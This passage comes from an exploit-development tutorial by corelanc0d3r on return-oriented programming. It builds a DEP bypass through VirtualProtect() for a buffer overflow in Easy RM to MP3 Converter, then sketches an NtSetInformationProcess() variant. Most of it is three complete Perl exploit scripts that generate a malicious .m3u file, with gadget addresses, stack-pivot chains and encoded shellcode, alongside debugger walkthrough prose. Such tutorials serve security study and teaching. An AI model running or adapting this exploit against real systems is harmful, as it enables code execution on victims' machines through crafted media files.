 Step through the instructions and watch EAX, EDI and ESP closely. You should see that ESP ispushed onto the stack, placed into EDI. Then EDI is pushed onto the stack and picked up in EAX.Finally 0×20 bytes are added to ESP and RET will put 4A4A4A4A in EIP (JJJJ = my $rop2)Got that ?  Let’s continue. Stage 2 : crafting the first parameter (return address)We will now work on generating the first parameter and overwriting the placeholder for the firstparameter on the stack.The first parameter needs to point to the shellcode. This parameter will be used as return addressfor the VirtualProtect() function so, when the function has marked the page as executable, it wouldautomatically jump to it.Where is our shellcode ?  Well, scroll down in the stack view. Right after the nops, you will see theshellcode.The plan is to use EAX or EDI (both contain a value on the stack), and increase that, leaving enoughroom for future rop gadgets, so it would point to the nops / shellcode.(You can play with the size of the nops to make sure the altered value will always point at thenops/shellcode, so it should be pretty generic)Changing the value is as easy as adding bytes to the register. Suppose we want to use EAX, we canlook for rop gadgets that would do ADD EAX,<some value> + RETA possible gadget would be :0x1002DC4C :  # ADD EAX,100 # POP EBP # RETN   [Module : MSRMfilter03.dll] 
This would increase EAX with 0×100.  One increase should be enough (0×100 = 256 bytes). And ifit is not enough, we can insert another add later on.Next, we need to write this value onto the stack, overwriting the placeholder (which currentlycontains "WWWW" or 57575757).How can we do this ?The easiest way is to look for a pointer to MOV DWORD PTR DS:[register],EAX.  If we can make[register] point to the address where the placeholder is located, then we would end up overwritingthat location with the contents of EAX ( = pointer to the shellcode)A possible pointer would be this one :0x77E84115 :  # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN   [Module : RPCRT4.dll] In order to make this work, we have to put a pointer to the placeholder-0×10  into ESI. After thevalue was written, we’ll have the pointer to the placeholder in EAX (MOV EAX,ESI) which is good...we might be able to re-use it later on.  Next, we need to insert some padding to compensate forthe POP ESI instruction.Tip : get yourself a copy of UnxUtils (port of the most important GNU utilities, forWin32). That way can use cat & grep to look for good gadgets :cat rop.txt | grep "MOV DWORD PTR DS:\[ESI+10],EAX # MOV EAX,ESI"(don’t forget the backslash between :  and [ )But before we can use this instruction, we have to put the right value into ESI.  We have a pointer tothe stack in EDI and EAX. EAX will already be used/changed (pointer to shellcode, remember), so weshould try to put EDI into ESI and then alter it a bit so it points at parameter_1_placeholder - 0x10 :0x763C982F :  # XCHG ESI,EDI # DEC ECX # RETN 4   [Module : comdlg32.dll] Putting these 3 things together, our first real rop chain will look like this :Put EDI into ESI (and increase it, if necessary, so it would point at placeholder1), change the value inEAX so it would point at the shellcode, and then overwrite the placeholder.(Note : For the first overwrite operation, ESI will automatically point to the right location, so no needto increase or decrease the value. ESI+10 will point at the location of the first parameterplaceholder)In between the gadgets, we'll need to compensate for additional POP's and RETN4. After putting things together, this is what the sploit script looks like so far :#------------------------------------------------------------#ROP based exploit for Easy RM to MP3 Converter#written by corelanc0d3r - http://www.corelan.be:8800#------------------------------------------------------------my $file= "rop.m3u";my $buffersize = 26094;my $junk = "Z" x $buffersize;my $eip=pack('V',0x100102DC); #return to stackmy $junk2 = "AAAA"; #compensate
#------Put stack pointer in EDI & EAX------------------------#my $rop=pack('V',0x5AD79277);  #PUSH ESP, POP EDI$rop = $rop.pack('V',0x77C1E842); #PUSH EDI, POP EAX$rop=$rop."AAAA"; #compensate for POP EBP#stack pointer is now in EAX & EDI, now jump over parameters$rop=$rop.pack('V',0x1001653D);  #ADD ESP,20#-------Parameters for VirtualProtect()----------------------#my $params=pack('V',0x7C801AD4);          #VirtualProtect()$params = $params."WWWW";   #return address (param1)$params = $params."XXXX";   #lpAddress      (param2)$params = $params."YYYY";   #Size           (param3)$params = $params."ZZZZ";   #flNewProtect   (param4)$params = $params.pack('V',0x10035005);  #writeable address$params=$params.("H" x 8);  #padding# ADD ESP,20 + RET will land here# change ESI so it points to correct location# to write first parameter (return address)my $rop2= pack('V',0x763C982F);  # XCHG ESI,EDI # DEC ECX # RETN 4#-----Make eax point at shellcode--------------------------$rop2=$rop2.pack('V',0x1002DC4C);  #ADD EAX,100 # POP EBP$rop2=$rop2."AAAA"; #padding - compensate for RETN4 before$rop2=$rop2."AAAA"; #padding#----------------------------------------------------------#return address is in EAX - write parameter 1$rop2=$rop2.pack('V',0x77E84115);$rop2=$rop2."AAAA"; #padding#my $nops = "\x90" x 240;## ./msfpayload windows/messagebox#  TITLE=CORELAN TEXT="rop test by corelanc0d3r" R# | ./msfencode -e x86/alpha_mixed -t perlmy $shellcode ="\x89\xe0\xda\xcf\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a" ."\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59" ."\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" ."\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" ."\x75\x4a\x49\x48\x59\x48\x6b\x4f\x6b\x48\x59\x43\x44\x51" ."\x34\x4c\x34\x50\x31\x48\x52\x4f\x42\x42\x5a\x46\x51\x49" ."\x59\x45\x34\x4e\x6b\x51\x61\x44\x70\x4e\x6b\x43\x46\x46" ."\x6c\x4c\x4b\x42\x56\x45\x4c\x4c\x4b\x42\x66\x43\x38\x4c" ."\x4b\x51\x6e\x45\x70\x4e\x6b\x50\x36\x44\x78\x42\x6f\x45" ."\x48\x44\x35\x4c\x33\x50\x59\x43\x31\x4a\x71\x4b\x4f\x48" ."\x61\x43\x50\x4c\x4b\x50\x6c\x51\x34\x46\x44\x4e\x6b\x47" ."\x35\x45\x6c\x4c\x4b\x42\x74\x43\x35\x42\x58\x46\x61\x48" ."\x6a\x4e\x6b\x51\x5a\x45\x48\x4e\x6b\x42\x7a\x47\x50\x47" ."\x71\x48\x6b\x4a\x43\x45\x67\x42\x69\x4e\x6b\x47\x44\x4e" ."\x6b\x46\x61\x48\x6e\x46\x51\x49\x6f\x45\x61\x49\x50\x49" ."\x6c\x4e\x4c\x4d\x54\x49\x50\x50\x74\x45\x5a\x4b\x71\x48" ."\x4f\x44\x4d\x47\x71\x4b\x77\x48\x69\x48\x71\x49\x6f\x49" ."\x6f\x4b\x4f\x45\x6b\x43\x4c\x47\x54\x44\x68\x51\x65\x49" ."\x4e\x4e\x6b\x50\x5a\x45\x74\x46\x61\x48\x6b\x50\x66\x4e" ."\x6b\x46\x6c\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x45\x51\x4a" ."\x4b\x4e\x6b\x43\x34\x4c\x4b\x43\x31\x4a\x48\x4d\x59\x42" ."\x64\x51\x34\x47\x6c\x45\x31\x4f\x33\x4f\x42\x47\x78\x44" ."\x69\x49\x44\x4f\x79\x4a\x45\x4e\x69\x4a\x62\x43\x58\x4e" ."\x6e\x42\x6e\x44\x4e\x48\x6c\x43\x62\x4a\x48\x4d\x4c\x4b" ."\x4f\x4b\x4f\x49\x6f\x4d\x59\x42\x65\x43\x34\x4f\x4b\x51" ."\x6e\x48\x58\x48\x62\x43\x43\x4e\x67\x47\x6c\x45\x74\x43" ."\x62\x49\x78\x4e\x6b\x4b\x4f\x4b\x4f\x49\x6f\x4f\x79\x50" ."\x45\x45\x58\x42\x48\x50\x6c\x42\x4c\x51\x30\x4b\x4f\x51" ."\x78\x50\x33\x44\x72\x44\x6e\x51\x74\x50\x68\x42\x55\x50" ."\x73\x42\x45\x42\x52\x4f\x78\x43\x6c\x47\x54\x44\x4a\x4c" ."\x49\x4d\x36\x50\x56\x4b\x4f\x43\x65\x47\x74\x4c\x49\x48" ."\x42\x42\x70\x4f\x4b\x49\x38\x4c\x62\x50\x4d\x4d\x6c\x4e" .
"\x67\x45\x4c\x44\x64\x51\x42\x49\x78\x51\x4e\x49\x6f\x4b" ."\x4f\x49\x6f\x42\x48\x42\x6c\x43\x71\x42\x6e\x50\x58\x50" ."\x68\x47\x33\x42\x6f\x50\x52\x43\x75\x45\x61\x4b\x6b\x4e" ."\x68\x51\x4c\x47\x54\x47\x77\x4d\x59\x4b\x53\x50\x68\x51" ."\x48\x47\x50\x51\x30\x51\x30\x42\x48\x50\x30\x51\x74\x50" ."\x33\x50\x72\x45\x38\x42\x4c\x45\x31\x50\x6e\x51\x73\x43" ."\x58\x50\x63\x50\x6f\x43\x42\x50\x65\x42\x48\x47\x50\x43" ."\x52\x43\x49\x51\x30\x51\x78\x43\x44\x42\x45\x51\x63\x50" ."\x74\x45\x38\x44\x32\x50\x6f\x42\x50\x51\x30\x46\x51\x48" ."\x49\x4c\x48\x42\x6c\x47\x54\x44\x58\x4d\x59\x4b\x51\x46" ."\x51\x48\x52\x51\x42\x46\x33\x50\x51\x43\x62\x49\x6f\x4e" ."\x30\x44\x71\x49\x50\x50\x50\x4b\x4f\x50\x55\x45\x58\x45" ."\x5a\x41\x41";my $rest = "C" x 300;my $payload = $junk.$eip.$junk2.$rop.$params.$rop2.$nops.$shellcode.$rest;print "Payload size : ".length($payload)."\n";print "Shellcode size : ".length($shellcode)."\n";open($FILE,">$file");print $FILE $payload;close($FILE);print "m3u File $file Created successfully\n";Let's step through in the debugger and see what happens after add esp,20 + ret is executed :ret returns to 0x763C982F (which puts EDI into ESI).At this time, the registers look like this :
(EAX and ESI now point to the saved address on the stack)This gadget returns to 0x1002DC4C, which will add 0x100 bytes to EAX. This will increase the valuein EAX to 0010F834, which points to the nops before the shellcode :
This gadget will return to 0x77E84115, which will perform the following instructions :

1. It will write EAX (=0x0010F834) into the address contained in ESI, + 0x10.  ESI currently contains0x0010F34.  At ESI+10 (0x0010F44), we have the placeholder for the return address :
When the mov instruction is executed, we have successfully written our return address (pointer tonops) as parameter to the VirtualProtect() function :
2. ESI will be saved in EAX, and some data from the stack is saved into ESI. Stage 3 : crafting the second parameter (lpAddress)The second parameter needs to point at the location that needs to be marked executable. We willsimply use the same pointer as the one used for the first parameter.This means that we can - more or less - repeat the entire sequence from stage 2, but before wecan do this, we need to reset our start values.At the current time, EAX still holds the initial saved stack pointer. We have to put it back in ESI. Sowe have to find a gadget that would do something like this : PUSH EAX, POP ESI, RET0x775D131E :  # PUSH EAX # POP ESI # RETN   [Module : ole32.dll] Then, we have to increase the value in EAX again (add 0x100). We can use the same gadget as theone used to generate the value for parameter 1 again : 0x1002DC4C (ADD EAX,100 # POP EBP #RET)Finally, we have to increase the value in ESI with 4 bytes, to make sure it will point to the nextparameter. All we need is ADD ESI,4 + RET, or 4 times  INC ESI, RETI will use0x77157D1D :  # INC ESI # RETN   [Module : OLEAUT32.dll] (4 times).So, the updated sploit script will now look like this :#------------------------------------------------------------#ROP based exploit for Easy RM to MP3 Converter#written by corelanc0d3r - http://www.corelan.be:8800#------------------------------------------------------------my $file= "rop.m3u";
my $buffersize = 26094;my $junk = "Z" x $buffersize;my $eip=pack('V',0x100102DC); #return to stackmy $junk2 = "AAAA"; #compensate#------Put stack pointer in EDI & EAX------------------------#my $rop=pack('V',0x5AD79277);  #PUSH ESP, POP EDI$rop = $rop.pack('V',0x77C1E842); #PUSH EDI, POP EAX$rop=$rop."AAAA"; #compensate for POP EBP#stack pointer is now in EAX & EDI, now jump over parameters$rop=$rop.pack('V',0x1001653D);  #ADD ESP,20#-------Parameters for VirtualProtect()----------------------#my $params=pack('V',0x7C801AD4);          #VirtualProtect()$params = $params."WWWW";   #return address (param1)$params = $params."XXXX";   #lpAddress      (param2)$params = $params."YYYY";   #Size           (param3)$params = $params."ZZZZ";   #flNewProtect   (param4)$params = $params.pack('V',0x10035005);  #writeable address$params=$params.("H" x 8);  #padding# ADD ESP,20 + RET will land here# change ESI so it points to correct location# to write first parameter (return address)my $rop2= pack('V',0x763C982F);  # XCHG ESI,EDI # DEC ECX # RETN 4#-----Make eax point at shellcode--------------------------$rop2=$rop2.pack('V',0x1002DC4C);  #ADD EAX,100 # POP EBP$rop2=$rop2."AAAA"; #padding - compensate for RETN4 before$rop2=$rop2."AAAA"; #padding#----------------------------------------------------------#return address is in EAX - write parameter 1$rop2=$rop2.pack('V',0x77E84115);$rop2=$rop2."AAAA"; #padding#EAX now contains stack pointer#save it back to ESI first$rop2=$rop2.pack('V',0x775D131E);  # PUSH EAX # POP ESI # RETN#-----Make eax point at shellcode (again)--------------------------$rop2=$rop2.pack('V',0x1002DC4C);  #ADD EAX,100 # POP EBP$rop2=$rop2."AAAA"; #padding#increase ESI with 4$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]#and write lpAddress (param 2)$rop2=$rop2.pack('V',0x77E84115);$rop2=$rop2."AAAA"; #padding#my $nops = "\x90" x 240;## ./msfpayload windows/messagebox#  TITLE=CORELAN TEXT="rop test by corelanc0d3r" R# | ./msfencode -e x86/alpha_mixed -t perlmy $shellcode ="\x89\xe0\xda\xcf\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a" ."\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59" ."\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" ."\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" ."\x75\x4a\x49\x48\x59\x48\x6b\x4f\x6b\x48\x59\x43\x44\x51" ."\x34\x4c\x34\x50\x31\x48\x52\x4f\x42\x42\x5a\x46\x51\x49" ."\x59\x45\x34\x4e\x6b\x51\x61\x44\x70\x4e\x6b\x43\x46\x46" ."\x6c\x4c\x4b\x42\x56\x45\x4c\x4c\x4b\x42\x66\x43\x38\x4c" ."\x4b\x51\x6e\x45\x70\x4e\x6b\x50\x36\x44\x78\x42\x6f\x45" ."\x48\x44\x35\x4c\x33\x50\x59\x43\x31\x4a\x71\x4b\x4f\x48" ."\x61\x43\x50\x4c\x4b\x50\x6c\x51\x34\x46\x44\x4e\x6b\x47" ."\x35\x45\x6c\x4c\x4b\x42\x74\x43\x35\x42\x58\x46\x61\x48" ."\x6a\x4e\x6b\x51\x5a\x45\x48\x4e\x6b\x42\x7a\x47\x50\x47" ."\x71\x48\x6b\x4a\x43\x45\x67\x42\x69\x4e\x6b\x47\x44\x4e" .
"\x6b\x46\x61\x48\x6e\x46\x51\x49\x6f\x45\x61\x49\x50\x49" ."\x6c\x4e\x4c\x4d\x54\x49\x50\x50\x74\x45\x5a\x4b\x71\x48" ."\x4f\x44\x4d\x47\x71\x4b\x77\x48\x69\x48\x71\x49\x6f\x49" ."\x6f\x4b\x4f\x45\x6b\x43\x4c\x47\x54\x44\x68\x51\x65\x49" ."\x4e\x4e\x6b\x50\x5a\x45\x74\x46\x61\x48\x6b\x50\x66\x4e" ."\x6b\x46\x6c\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x45\x51\x4a" ."\x4b\x4e\x6b\x43\x34\x4c\x4b\x43\x31\x4a\x48\x4d\x59\x42" ."\x64\x51\x34\x47\x6c\x45\x31\x4f\x33\x4f\x42\x47\x78\x44" ."\x69\x49\x44\x4f\x79\x4a\x45\x4e\x69\x4a\x62\x43\x58\x4e" ."\x6e\x42\x6e\x44\x4e\x48\x6c\x43\x62\x4a\x48\x4d\x4c\x4b" ."\x4f\x4b\x4f\x49\x6f\x4d\x59\x42\x65\x43\x34\x4f\x4b\x51" ."\x6e\x48\x58\x48\x62\x43\x43\x4e\x67\x47\x6c\x45\x74\x43" ."\x62\x49\x78\x4e\x6b\x4b\x4f\x4b\x4f\x49\x6f\x4f\x79\x50" ."\x45\x45\x58\x42\x48\x50\x6c\x42\x4c\x51\x30\x4b\x4f\x51" ."\x78\x50\x33\x44\x72\x44\x6e\x51\x74\x50\x68\x42\x55\x50" ."\x73\x42\x45\x42\x52\x4f\x78\x43\x6c\x47\x54\x44\x4a\x4c" ."\x49\x4d\x36\x50\x56\x4b\x4f\x43\x65\x47\x74\x4c\x49\x48" ."\x42\x42\x70\x4f\x4b\x49\x38\x4c\x62\x50\x4d\x4d\x6c\x4e" ."\x67\x45\x4c\x44\x64\x51\x42\x49\x78\x51\x4e\x49\x6f\x4b" ."\x4f\x49\x6f\x42\x48\x42\x6c\x43\x71\x42\x6e\x50\x58\x50" ."\x68\x47\x33\x42\x6f\x50\x52\x43\x75\x45\x61\x4b\x6b\x4e" ."\x68\x51\x4c\x47\x54\x47\x77\x4d\x59\x4b\x53\x50\x68\x51" ."\x48\x47\x50\x51\x30\x51\x30\x42\x48\x50\x30\x51\x74\x50" ."\x33\x50\x72\x45\x38\x42\x4c\x45\x31\x50\x6e\x51\x73\x43" ."\x58\x50\x63\x50\x6f\x43\x42\x50\x65\x42\x48\x47\x50\x43" ."\x52\x43\x49\x51\x30\x51\x78\x43\x44\x42\x45\x51\x63\x50" ."\x74\x45\x38\x44\x32\x50\x6f\x42\x50\x51\x30\x46\x51\x48" ."\x49\x4c\x48\x42\x6c\x47\x54\x44\x58\x4d\x59\x4b\x51\x46" ."\x51\x48\x52\x51\x42\x46\x33\x50\x51\x43\x62\x49\x6f\x4e" ."\x30\x44\x71\x49\x50\x50\x50\x4b\x4f\x50\x55\x45\x58\x45" ."\x5a\x41\x41";my $rest = "C" x 300;my $payload = $junk.$eip.$junk2.$rop.$params.$rop2.$nops.$shellcode.$rest;print "Payload size : ".length($payload)."\n";print "Shellcode size : ".length($shellcode)."\n";open($FILE,">$file");print $FILE $payload;close($FILE);print "m3u File $file Created successfully\n";Stage 4 and 5 : third and fourth parameter (size and protection flag)In order to create the third parameter, I decided to set the size to 0x300 bytes.  The gadgets weneed to do this are XOR EAX,EAX  and   ADD EAX,100The technique to write the resulting value as a parameter is exactly the same as with the otherparametersSave EAX into ESIChange EAX (XOR EAX,EAX : 0x100307A9, and then ADD EAX,100 + RET, 3 times in a row :0x1002DC4C)Increase ESI with 4 bytesWrite EAX to ESI+0x10The fourth parameter (0x40) uses the same principle again :Save EAX into ESISet EAX to zero and then add 40  (XOR EAX,EAX + RET : 0x100307A9  /  ADD EAX,40 + RET :0x1002DC41)Increase ESI with 4 bytesWrite EAX to ESI+0x10
 Final stage : jump to VirtualProtectAll parameters are now written to the stack :
All we need to do now is find a way to make ESP point to the location where the pointer toVirtualProtect() is stored (directly followed by the arguments to that function), and somehow returnto it.The current state of the registers is :
What are my options to do this ?  How can I make ESP point at 0010F740 and then return (to thepointer to VirtualProtect()) ?Answer : EAX already points at this address. So if we can put eax into esp and then return, it shouldbe fine.Search rop.txt for a push eax / pop esp combination :0x73DF5CA8 # PUSH EAX # POP ESP # MOV EAX,EDI # POP EDI # POP ESI # RETN   [Module : MFC42.DLL] This one will work, but there are 2 POP instructions in the gadget. So we have to adjust EAX first (tocompensate for the POP's). We basically need to subtract 8 from eax first, before adjusting thestack.To do that, we can use0x775D12F1  #SUB EAX,4 # RETOur final chain will look like this :0x775D12F10x775D12F1
0x73DF5CA8Put everything together in the exploit script :#------------------------------------------------------------#ROP based exploit for Easy RM to MP3 Converter#written by corelanc0d3r - http://www.corelan.be:8800#------------------------------------------------------------my $file= "rop.m3u";my $buffersize = 26094;my $junk = "Z" x $buffersize;my $eip=pack('V',0x100102DC); #return to stackmy $junk2 = "AAAA"; #compensate#------Put stack pointer in EDI & EAX------------------------#my $rop=pack('V',0x5AD79277);  #PUSH ESP, POP EDI$rop = $rop.pack('V',0x77C1E842); #PUSH EDI, POP EAX$rop=$rop."AAAA"; #compensate for POP EBP#stack pointer is now in EAX & EDI, now jump over parameters$rop=$rop.pack('V',0x1001653D);  #ADD ESP,20#-------Parameters for VirtualProtect()----------------------#my $params=pack('V',0x7C801AD4);          #VirtualProtect()$params = $params."WWWW";   #return address (param1)$params = $params."XXXX";   #lpAddress      (param2)$params = $params."YYYY";   #Size           (param3)$params = $params."ZZZZ";   #flNewProtect   (param4)$params = $params.pack('V',0x10035005);  #writeable address$params=$params.("H" x 8);  #padding# ADD ESP,20 + RET will land here# change ESI so it points to correct location# to write first parameter (return address)my $rop2= pack('V',0x763C982F);  # XCHG ESI,EDI # DEC ECX # RETN 4#-----Make eax point at shellcode--------------------------$rop2=$rop2.pack('V',0x1002DC4C);  #ADD EAX,100 # POP EBP$rop2=$rop2."AAAA"; #padding - compensate for RETN4 before$rop2=$rop2."AAAA"; #padding#----------------------------------------------------------#return address is in EAX - write parameter 1$rop2=$rop2.pack('V',0x77E84115);$rop2=$rop2."AAAA"; #padding#EAX now contains stack pointer#save it back to ESI first$rop2=$rop2.pack('V',0x775D131E);  # PUSH EAX # POP ESI # RETN#-----Make eax point at shellcode (again)--------------------------$rop2=$rop2.pack('V',0x1002DC4C);  #ADD EAX,100 # POP EBP$rop2=$rop2."AAAA"; #padding#increase ESI with 4$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]#and write lpAddress (param 2)$rop2=$rop2.pack('V',0x77E84115);$rop2=$rop2."AAAA"; #padding  #save EAX in ESI again$rop2=$rop2.pack('V',0x775D131E);  # PUSH EAX # POP ESI # RETN#create size - set EAX to 300 or so$rop2=$rop2.pack('V',0x100307A9);  # XOR EAX,EAX # RETN$rop2=$rop2.pack('V',0x1002DC4C);  #ADD EAX,100 # POP EBP$rop2=$rop2."AAAA"; #padding$rop2=$rop2.pack('V',0x1002DC4C);  #ADD EAX,100 # POP EBP$rop2=$rop2."AAAA"; #padding$rop2=$rop2.pack('V',0x1002DC4C);  #ADD EAX,100 # POP EBP$rop2=$rop2."AAAA"; #padding
#write size, first set ESI to right place$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]#write (param 3)$rop2=$rop2.pack('V',0x77E84115);$rop2=$rop2."AAAA"; #padding#save EAX in ESI again$rop2=$rop2.pack('V',0x775D131E);  # PUSH EAX # POP ESI # RETN#flNewProtect 0x40$rop2=$rop2.pack('V',0x10010C77);   #XOR EAX,EAX$rop2=$rop2.pack('V',0x1002DC41);   #ADD EAX,40 # POP EBP$rop2=$rop2."AAAA"; #padding$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll] #write (param4)$rop2=$rop2.pack('V',0x77E84115);$rop2=$rop2."AAAA"; #padding#Return to VirtualProtect()#EAX points at VirtualProtect pointer (just before parameters)#compensate for the 2 POP instructions$rop2=$rop2.pack('V',0x775D12F1);  #SUB EAX,4 # RET$rop2=$rop2.pack('V',0x775D12F1);  #SUB EAX,4 # RET#change ESP & fly back$rop2=$rop2.pack('V',0x73DF5CA8);  #[Module : MFC42.DLL]# PUSH EAX # POP ESP # MOV EAX,EDI # POP EDI # POP ESI # RETN   #my $nops = "\x90" x 240;## ./msfpayload windows/messagebox#  TITLE=CORELAN TEXT="rop test by corelanc0d3r" R# | ./msfencode -e x86/alpha_mixed -t perlmy $shellcode ="\x89\xe0\xda\xcf\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a" ."\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59" ."\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" ."\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" ."\x75\x4a\x49\x48\x59\x48\x6b\x4f\x6b\x48\x59\x43\x44\x51" ."\x34\x4c\x34\x50\x31\x48\x52\x4f\x42\x42\x5a\x46\x51\x49" ."\x59\x45\x34\x4e\x6b\x51\x61\x44\x70\x4e\x6b\x43\x46\x46" ."\x6c\x4c\x4b\x42\x56\x45\x4c\x4c\x4b\x42\x66\x43\x38\x4c" ."\x4b\x51\x6e\x45\x70\x4e\x6b\x50\x36\x44\x78\x42\x6f\x45" ."\x48\x44\x35\x4c\x33\x50\x59\x43\x31\x4a\x71\x4b\x4f\x48" ."\x61\x43\x50\x4c\x4b\x50\x6c\x51\x34\x46\x44\x4e\x6b\x47" ."\x35\x45\x6c\x4c\x4b\x42\x74\x43\x35\x42\x58\x46\x61\x48" ."\x6a\x4e\x6b\x51\x5a\x45\x48\x4e\x6b\x42\x7a\x47\x50\x47" ."\x71\x48\x6b\x4a\x43\x45\x67\x42\x69\x4e\x6b\x47\x44\x4e" ."\x6b\x46\x61\x48\x6e\x46\x51\x49\x6f\x45\x61\x49\x50\x49" ."\x6c\x4e\x4c\x4d\x54\x49\x50\x50\x74\x45\x5a\x4b\x71\x48" ."\x4f\x44\x4d\x47\x71\x4b\x77\x48\x69\x48\x71\x49\x6f\x49" ."\x6f\x4b\x4f\x45\x6b\x43\x4c\x47\x54\x44\x68\x51\x65\x49" ."\x4e\x4e\x6b\x50\x5a\x45\x74\x46\x61\x48\x6b\x50\x66\x4e" ."\x6b\x46\x6c\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x45\x51\x4a" ."\x4b\x4e\x6b\x43\x34\x4c\x4b\x43\x31\x4a\x48\x4d\x59\x42" ."\x64\x51\x34\x47\x6c\x45\x31\x4f\x33\x4f\x42\x47\x78\x44" ."\x69\x49\x44\x4f\x79\x4a\x45\x4e\x69\x4a\x62\x43\x58\x4e" ."\x6e\x42\x6e\x44\x4e\x48\x6c\x43\x62\x4a\x48\x4d\x4c\x4b" ."\x4f\x4b\x4f\x49\x6f\x4d\x59\x42\x65\x43\x34\x4f\x4b\x51" ."\x6e\x48\x58\x48\x62\x43\x43\x4e\x67\x47\x6c\x45\x74\x43" ."\x62\x49\x78\x4e\x6b\x4b\x4f\x4b\x4f\x49\x6f\x4f\x79\x50" .
"\x45\x45\x58\x42\x48\x50\x6c\x42\x4c\x51\x30\x4b\x4f\x51" ."\x78\x50\x33\x44\x72\x44\x6e\x51\x74\x50\x68\x42\x55\x50" ."\x73\x42\x45\x42\x52\x4f\x78\x43\x6c\x47\x54\x44\x4a\x4c" ."\x49\x4d\x36\x50\x56\x4b\x4f\x43\x65\x47\x74\x4c\x49\x48" ."\x42\x42\x70\x4f\x4b\x49\x38\x4c\x62\x50\x4d\x4d\x6c\x4e" ."\x67\x45\x4c\x44\x64\x51\x42\x49\x78\x51\x4e\x49\x6f\x4b" ."\x4f\x49\x6f\x42\x48\x42\x6c\x43\x71\x42\x6e\x50\x58\x50" ."\x68\x47\x33\x42\x6f\x50\x52\x43\x75\x45\x61\x4b\x6b\x4e" ."\x68\x51\x4c\x47\x54\x47\x77\x4d\x59\x4b\x53\x50\x68\x51" ."\x48\x47\x50\x51\x30\x51\x30\x42\x48\x50\x30\x51\x74\x50" ."\x33\x50\x72\x45\x38\x42\x4c\x45\x31\x50\x6e\x51\x73\x43" ."\x58\x50\x63\x50\x6f\x43\x42\x50\x65\x42\x48\x47\x50\x43" ."\x52\x43\x49\x51\x30\x51\x78\x43\x44\x42\x45\x51\x63\x50" ."\x74\x45\x38\x44\x32\x50\x6f\x42\x50\x51\x30\x46\x51\x48" ."\x49\x4c\x48\x42\x6c\x47\x54\x44\x58\x4d\x59\x4b\x51\x46" ."\x51\x48\x52\x51\x42\x46\x33\x50\x51\x43\x62\x49\x6f\x4e" ."\x30\x44\x71\x49\x50\x50\x50\x4b\x4f\x50\x55\x45\x58\x45" ."\x5a\x41\x41";my $rest = "C" x 300;my $payload = $junk.$eip.$junk2.$rop.$params.$rop2.$nops.$shellcode.$rest;print "Payload size : ".length($payload)."\n";print "Shellcode size : ".length($shellcode)."\n";open($FILE,">$file");print $FILE $payload;close($FILE);print "m3u File $file Created successfully\n";Result :
 Direct RET - ROP Version 2 - NtSetInformationProcess()Let's use the same application/vulnerability again to test a different ROP bypass technique :NtSetInformationProcess()This function takes 5 parameters :Return addressValue to be generated, indicates where function needs to return to (=location where your shellcode is placedNtCurrentProcess()Static value, set to 0xFFFFFFFFProcessExecuteFlagsStatic value, set to 0x22&ExecuteFlagsPointer to 0x00000002, may be a static address hardcoded in your sploit,but must be writeablesizeOf(ExecuteFlags)Static value, set to 0x4The exploit rop layout will most likely look pretty much the same as with VirtualProtect() :save stack position
jump over the placeholdersgenerate the value for the return addressgenerate the value for the second parameter (0x22) and use "ESI+0x10" to write it onto thestackzero out eax : XOR EAX,EAX + RET : 0x100307A9 ADD EAX,40 + RET : 0x1002DC41 + chain of pointers to ADD EAX,-2 until it contains0x22 (0x10027D2E)Alternatively, use ADD AL,10 (0x100308FD) twice and then INC EAX twice(0x1001152C)if required, generate value for the third parameter (pointer to 0x2, writable address).  Tip : tryrunning "!pvefindaddr find 02000000 rw" in Immunity Debugger and see if you can find astatic / writeable address.generate the value for the fourth parameter (0x4) and use "ESI+0x10" to write it onto thestackinc eax 4 times : 0x1001152CGood exercise.Just to prove that it works :
